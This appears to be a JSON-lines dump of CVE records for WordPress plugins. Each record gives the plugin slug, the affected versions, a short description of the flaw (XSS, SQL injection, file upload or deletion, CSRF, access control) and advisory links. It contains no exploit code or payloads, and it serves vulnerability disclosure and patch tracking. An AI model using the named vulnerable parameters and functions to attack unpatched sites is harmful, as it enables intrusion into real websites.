{"CVE_ID":"CVE-2024-3230","slug":"download-attachments","versionImpact":"1.3","description":"The Download Attachments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'download-attachments' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62475d8f-a0f6-45ab-abd0-ad24e1887c91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62475d8f-a0f6-45ab-abd0-ad24e1887c91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-attachments\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-attachments\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3558","slug":"custom-field-suite","versionImpact":"2.6.7","description":"The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cfs[post_title]' parameter versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e4dc6fd-4bd5-4ed1-ade0-cf2f8831fac3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e4dc6fd-4bd5-4ed1-ade0-cf2f8831fac3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/field_group.php#L20\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/field_group.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/form.php#L64\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/form.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/api.php#L282\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/api.php#L282\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPress\\\/WordPress\\\/blob\\\/22d95abc55824e83904dc0fef290464b6bec7708\\\/wp-admin\\\/includes\\\/template.php#L1384\",\"name\":\"https:\\\/\\\/github.com\\\/WordPress\\\/WordPress\\\/blob\\\/22d95abc55824e83904dc0fef290464b6bec7708\\\/wp-admin\\\/includes\\\/template.php#L1384\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/en-gb.wordpress.org\\\/plugins\\\/custom-field-suite\\\/\",\"name\":\"https:\\\/\\\/en-gb.wordpress.org\\\/plugins\\\/custom-field-suite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/\",\"name\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/core.trac.wordpress.org\\\/ticket\\\/56655\",\"name\":\"https:\\\/\\\/core.trac.wordpress.org\\\/ticket\\\/56655\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7257","slug":"yayextra","versionImpact":"1.3.7","description":"The YayExtra \u2013 WooCommerce Extra Product Options plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the handle_upload_file function in all versions up to, and including, 1.3.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/753a4f7a-7bd4-43a4-b8fb-9e982239ba0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/753a4f7a-7bd4-43a4-b8fb-9e982239ba0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yayextra\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yayextra\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayextra\\\/tags\\\/1.3.6\\\/includes\\\/Classes\\\/ProductPage.php#L1413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayextra\\\/tags\\\/1.3.6\\\/includes\\\/Classes\\\/ProductPage.php#L1413\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayextra\\\/tags\\\/1.3.6\\\/includes\\\/Classes\\\/ProductPage.php#L1452\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayextra\\\/tags\\\/1.3.6\\\/includes\\\/Classes\\\/ProductPage.php#L1452\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129731\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129731\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9262","slug":"user-meta","versionImpact":"3.1","description":"The User Meta \u2013 User Profile Builder and User management plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.1 via the getUser() due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to obtain user meta values from form fields. Please note that this requires a site administrator to create a form that displays potentially sensitive information like password hashes. This may also be exploited by unauthenticated users if the  'user-meta-public-profile' shortcode is used insecurely.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed81348-7604-4858-bc8e-b4504d77ee45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed81348-7604-4858-bc8e-b4504d77ee45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-meta\\\/trunk\\\/models\\\/classes\\\/generate\\\/PublicProfile.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-meta\\\/trunk\\\/models\\\/classes\\\/generate\\\/PublicProfile.php#L28\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12731","slug":"aklamator-infeed","versionImpact":"2.0.0","description":"The Aklamator INfeed WordPress plugin through 2.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1c3754f-60e0-4a89-b4fc-89056dba3616\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1c3754f-60e0-4a89-b4fc-89056dba3616\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1560","slug":"wow-entrance-effects-wee","versionImpact":"0.1","description":"The WOW Entrance Effects (WEE!) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wee' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-entrance-effects-wee\\\/trunk\\\/wee.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-entrance-effects-wee\\\/trunk\\\/wee.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wow-entrance-effects-wee\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wow-entrance-effects-wee\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/423e840e-0bc2-4481-afff-61ace85788d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/423e840e-0bc2-4481-afff-61ace85788d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2004","slug":"simple-wp-events","versionImpact":"1.8.17","description":"The Simple WP Events plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the wpe_delete_file AJAX action in all versions up to, and including, 1.8.17. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-wp-events\\\/trunk\\\/admin\\\/includes\\\/wp-events-export-events.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-wp-events\\\/trunk\\\/admin\\\/includes\\\/wp-events-export-events.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abdca93e-f68d-4a96-8bd7-443ee46ccb5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abdca93e-f68d-4a96-8bd7-443ee46ccb5a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4669","slug":"booking","versionImpact":"10.11.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpbc shortcode in all versions up to, and including, 10.11.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L445\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L789\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L789\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293836\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293836\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4e43d66-04f4-4adb-93da-75e02d1c714e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4e43d66-04f4-4adb-93da-75e02d1c714e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49974","slug":"upstream","versionImpact":"2.1.0","description":"Missing Authorization vulnerability in upstreamplugin UpStream: a Project Management Plugin for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects UpStream: a Project Management Plugin for WordPress: from n\/a through 2.1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/upstream\\\/vulnerability\\\/wordpress-upstream-a-project-management-plugin-for-wordpress-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/upstream\\\/vulnerability\\\/wordpress-upstream-a-project-management-plugin-for-wordpress-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6054","slug":"yanewsflash","versionImpact":"1.0.3","description":"The YANewsflash plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the 'yanewsflash\/yanewsflash.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yanewsflash\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yanewsflash\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/171fe5db-0b43-47ba-b215-87ce9d7b5095?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/171fe5db-0b43-47ba-b215-87ce9d7b5095?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2009","slug":"pretty-url ","versionImpact":"1.5.4","description":"Plugin does not sanitize and escape the URL field in the Pretty Url WordPress plugin through 1.5.4 settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7988a18-ba9d-4ead-82c8-30ea8223846f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7988a18-ba9d-4ead-82c8-30ea8223846f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2556","slug":"currency-switcher","versionImpact":"1.1.9","description":"The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the anonymous function for the wpcs_sd_delete action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete an arbitrary custom drop-down currency switcher.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc44c95e-9ca0-46d0-8315-72612ef3f855?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc44c95e-9ca0-46d0-8315-72612ef3f855?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4427","slug":"free-comments-for-wordpress-vuukle","versionImpact":"3.4.31","description":"The Vuukle Comments, Reactions, Share Bar, Revenue plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.31. This is due to missing or incorrect nonce validation in the \/admin\/partials\/free-comments-for-wordpress-vuukle-admin-display.php file. This makes it possible for unauthenticated attackers to edit the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff28f33f-85d1-4987-975b-ee3bbcb394f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff28f33f-85d1-4987-975b-ee3bbcb394f4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2553337%40free-comments-for-wordpress-vuukle&new=2553337%40free-comments-for-wordpress-vuukle&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2553337%40free-comments-for-wordpress-vuukle&new=2553337%40free-comments-for-wordpress-vuukle&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5063","slug":"youtube-widget-responsive","versionImpact":"1.6.1","description":"The Widget Responsive for Youtube plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'youtube' shortcode in versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72daa533-8b17-420c-9b51-b5f72da2726c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72daa533-8b17-420c-9b51-b5f72da2726c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youtube-widget-responsive\\\/trunk\\\/youtube-widget-responsive.php?rev=2905626#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youtube-widget-responsive\\\/trunk\\\/youtube-widget-responsive.php?rev=2905626#L246\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968766\\\/youtube-widget-responsive#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968766\\\/youtube-widget-responsive#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1698","slug":"notificationx","versionImpact":"2.8.2","description":"The NotificationX \u2013 Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040809\\\/notificationx\\\/trunk\\\/includes\\\/Core\\\/Database.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040809\\\/notificationx\\\/trunk\\\/includes\\\/Core\\\/Database.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040809\\\/notificationx\\\/trunk\\\/includes\\\/Core\\\/Rest\\\/Analytics.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040809\\\/notificationx\\\/trunk\\\/includes\\\/Core\\\/Rest\\\/Analytics.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3641","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some parameters, which could allow unauthenticated visitors to perform Cross-Site Scripting attacks against admins","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4047f1e-d5ea-425f-8def-76dd5e6a497e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4047f1e-d5ea-425f-8def-76dd5e6a497e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3031","slug":"fluid-notification-bar","versionImpact":"3.2.3","description":"The Fluid Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/451ca8a1-9354-462a-a110-c0c813cf0725?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/451ca8a1-9354-462a-a110-c0c813cf0725?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluid-notification-bar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluid-notification-bar\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1168","slug":"wp-seopress","versionImpact":"7.9","description":"The SEOPress \u2013 On-site SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's social image URL in all versions up to, and including, 7.9 due to insufficient input sanitization and output escaping on user supplied image URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c446f429-1981-4d6d-a5ec-a5837428d212?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c446f429-1981-4d6d-a5ec-a5837428d212?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-seopress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-seopress\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9118","slug":"qs-dark-mode","versionImpact":"2.9","description":"The QS Dark Mode Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61fce18a-44ec-442f-879e-f4ceab93d972?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61fce18a-44ec-442f-879e-f4ceab93d972?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/qs-dark-mode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/qs-dark-mode\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159458\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159458\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2016-15040","slug":"kento-post-view-counter","versionImpact":"2.8","description":"The Kento Post View Counter plugin for WordPress is vulnerable to SQL Injection via the 'kento_pvc_geo' parameter in versions up to, and including, 2.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/525b466d-137a-467b-8b49-e51393a73866?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/525b466d-137a-467b-8b49-e51393a73866?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kento-post-view-counter\\\/trunk\\\/index.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kento-post-view-counter\\\/trunk\\\/index.php#L216\",\"refsource\":\"\",\"tags\":[]}]"}
